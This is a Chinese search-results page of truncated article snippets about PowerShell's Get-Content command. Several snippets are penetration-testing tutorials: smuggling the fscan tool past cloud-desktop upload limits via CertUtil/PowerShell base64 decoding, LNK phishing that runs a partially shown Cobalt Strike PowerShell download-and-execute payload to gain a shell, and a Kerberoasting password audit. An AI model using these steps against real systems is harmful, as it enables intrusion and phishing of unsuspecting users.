首页
学习
活动
专区
圈层
工具
发布

PowerShell实战:Get-Content命令使用详解

一、Get-Content介绍 Get-Content 主要作用是获取路径指定位置的项(文本类文件)的内容,例如文件中的文本或函数的内容。...对于文件,内容一次读取一行,并返回对象的集合,每个对象表示一行内容。...等 说明: PowerShell 3.0以后的版本开始支持从项的开头或末尾获取指定数量的行。...目前微软官方的例子运行也有异常。 -Stream:从文件中获取指定的备用 NTFS 文件流的内容。 输入流名称。不支持通配符。仅限Windows操作系统使用。...4.5使用逗号作为分隔符 4.6 Filter方式读取多个文件 获取指定目录下所有txt后缀的文件内容 4.7 Include方式读取多个文件 使用Include获取指定目录下所有txt后缀的文件内容

1.4K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Windows:PowerShell PSReadLine 模块及其命令历史维护

    PSReadLine 提供了先进的命令行编辑和历史记录功能,使得在命令行环境中工作更加高效和便捷。本文将详细讲解 PSReadLine 模块的功能及其在命令历史维护中的应用。...要查看 PSReadLine 维护的完整历史记录,可以直接读取历史记录文件: powershell Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell...持久化命令历史 要确保命令历史在每次会话退出时自动保存,并在新会话启动时加载,可以在 PowerShell 配置文件中添加以下设置: powershell Set-PSReadLineOption -...将以下代码添加到我们的 PowerShell 配置文件中(通常是 $PROFILE 文件): powershell function Show-History { Get-Content "$...无论是系统管理员还是开发者,掌握 PSReadLine 的使用方法都将显著提升他们在 PowerShell 中的工作体验。

    80710

    pycharm修改环境_pycharm更改环境

    ,每一行都添加了注释.问题就在这里,我们不能直接全选所有行,然后一次性粘贴到添加环境变量里面,因为那样设置的环境变量将包含后面的注释内容,而不是我们需要的 #号前的内容.所以只能一行一行的手动选择复制注释前的内容到上一步....当然了如果你的文件中没有注释,就不存在这个问题....故而今天学习了一会写出来一个PowerShell脚本,用来设置环境变量.内容如下: # PowerShell脚本 # 脚本作用读取文本,设置环境变量 #判断是否存在tmpenv.ps1文件,存在则删除...if(Test-Path tmpenv.ps1){rm tmpenv.ps1} #遍历存放环境变量的文本文件 evn.txt,在行首添加 "$env:"后追加到 tmpenv.ps1文件中 foreach...配置的Terminal是 PowerShell的情形,调试前只需要在Terminal中手动执行以下命令: . .

    1.9K30

    PowerShell 脚本必备命令

    PowerShell命令 最近工作中写了大量的 PowerShell 脚本,将一些常用的命令分享出来,希望能帮助到大家。...输出 csv 文件: Export-Csv -Path 文件路径 -Encoding UTF8 -NoTypeInformation -Force 3.PowerShell 输出 txt 文件: Out-File...: $txt = Get-Content 文件 $txt | Where-Object { -not ([string]::IsNullOrEmpty($_) -or [string]::IsNullOrWhiteSpace...-Encoding utf8 -Force } fn-GetLineCount 文件 7.去除文件中重复内容: $content = Get-Content 文件 $content | Select-Object...粉丝福利 最近小伙伴们应该发现了公众号的一些变化,那就是在菜单栏中 『干货分享』的二级菜单中多了一个专栏 『万门大学』。没错,这正是公众号联合万门大学,为长久以来关注的粉丝争取的福利。

    3.3K20

    内网渗透之云桌面文件上传限制绕过

    txt的文本文件,而且云桌面不出网,在这种情况下我们可以考虑通过window系统自带的一些工具来实现对文件上传限制的绕过 具体实现 CertUtil Windows 7之后的windows系统自带CertUtil...命令,它可以用于MD5、SHA1等算法的加密和解密操作,我们可以使用CertUtil对我们想要上传的exe文件进行base64加密并输出未文本之后在通过目标主机上的certUtil将其还原从而实现上传文件的目的....exe CertUtil -decode fscan_base64.txt fscan_base64.exe Step 4:执行解密后的fscan确定可以正常使用 Powershell Powershell...亦可以用于加密解密操作,这里的思路和上面一致,我们可以使用Powershell对想要上传到目标云桌面的exe程序进行base64加密操作并转为txt格式,之后上传txt到云桌面,最后在云桌面在调用系统自带的...Get-Content ("fscan_base64.txt") $PEBytes= [System.Convert]::FromBase64String($Base64Bytes) [System.IO.File

    28110

    记一次编写域账号弱口令审计工具

    0x00 背景 为了进行相关安全方面的认证,需要对公司域环境内员工账号的密码进行审计,作为一名刚从事信息安全的人员,尝试在本身拥有的权限以内,在不影响其他员工日常工作、不影响服务器正常运行的情况下,审计出使用弱密码作为登录口令的员工...刚开始想到可以使用Powershell通过LDAP向域控发送用户名和密码一个个进行爆破尝试 然而因为域环境下为设定了账户锁定策略,连续尝试5次失败后,会被锁定30min,会严重影响到被锁定账户员工的工作...\result\sucUserList.txt"){ Write-Host "传参错误,将启用文件sucSPNList.txt和sucUserList.txt中的内容"...访问SPN获得ST,并以hashcat模式保存到文件krbstHash.txt中 Get-ServiceTicket $krbstHashFile # 4...powershell下运行 ?

    1.4K00

    云桌面文件上传限制绕过

    txt的文本文件,而且云桌面不出网,在这种情况下我们可以考虑通过window系统自带的一些工具来实现对文件上传限制的绕过 具体实现 CertUtil Windows 7之后的windows系统自带CertUtil...命令,它可以用于MD5、SHA1等算法的加密和解密操作,我们可以使用CertUtil对我们想要上传的exe文件进行base64加密并输出未文本之后在通过目标主机上的certUtil将其还原从而实现上传文件的目的....exe CertUtil -decode fscan_base64.txt fscan_base64.exe Step 4:执行解密后的fscan确定可以正常使用 Powershell Powershell...亦可以用于加密解密操作,这里的思路和上面一致,我们可以使用Powershell对想要上传到目标云桌面的exe程序进行base64加密操作并转为txt格式,之后上传txt到云桌面,最后在云桌面在调用系统自带的...= Get-Content ("fscan_base64.txt") $PEBytes= [System.Convert]::FromBase64String($Base64Bytes) [System.IO.File

    4.4K10

    社工钓鱼之LNK钓鱼

    文章前言 LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell...命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch...:80/a'))" Step 2:制作一下txt文本 Step 3:制作一下powershell $file = Get-Content "Al1ex.txt" $WshShell = New-Object...Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行 Step 6:之后成功获得Shell 文末小结 基于LNK文件的钓鱼方式总体而言利用难度相对有点大,一般都需要通过钓鱼邮件的方式(...例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的,但是就得看点击率了~

    2K20

    PowerShell查找Unknown Group

    最近迁徙了一些用户从域A转到另外一个域B,为了方便继续访问旧的文件系统,保留了SID历史记录。今天发现个别运行在旧域A的 Citrix Xenapp程序不工作了。...经过检查,发现该程序启动的时候会自动运行 whoami /group自检,如果有无法解析的SID,自动结束。估计是迁徙的时候某些组的SID History出了问题。...豆子写了个很简单的powershell命令来查找 在域A上以用户身份登录,执行下列命令,whoami的结果先转化成csv文本,然后powershell再转化成结构化对象以便操作。...groups /fo csv | ConvertFrom-Csv | where{$_.type -match "Unknown SID type"} | select sid > K:\unknown.txt...结果如下 然后在域B上读取这个文本,进行Sid到组名的解析即可 $group=get-content K:\unknown.txt | select -skip 3 foreach ( $sid in

    43120

    内网学习笔记 | 2、PowerShell

    PowerShell 内置在 Windows 7、Windows Server 2008 R2 及更高版本的 Windows 系统中,同时 PowerShell 是构建在 .NET 平台上的,所有命令传递的都是...test.txt 查看文件test.txt内容:Get-Content test.txt 设置文件test.txt内容t:Set-Content test.txt -Value "hello"...给文件test.txt追加内容:Add-Content test.txt -Value ",word!"...清除文件test.txt内容:Clear-Content test.txt 绕过本地权限并执行 上面说到了默认情况下 PowerShell 的执行策略是受限模式Restricted,这就导致了在渗透测试过程中我们需要采用一些方法绕过这个策略.../ps_encoder.py 下载好后,需要先将要执行的命令保存到文本文件中,这里保存到了 tmp.txt 文本中,之后执行 python ps_encoder.py -s tmp.txt 即可 >cat

    1.6K20
    领券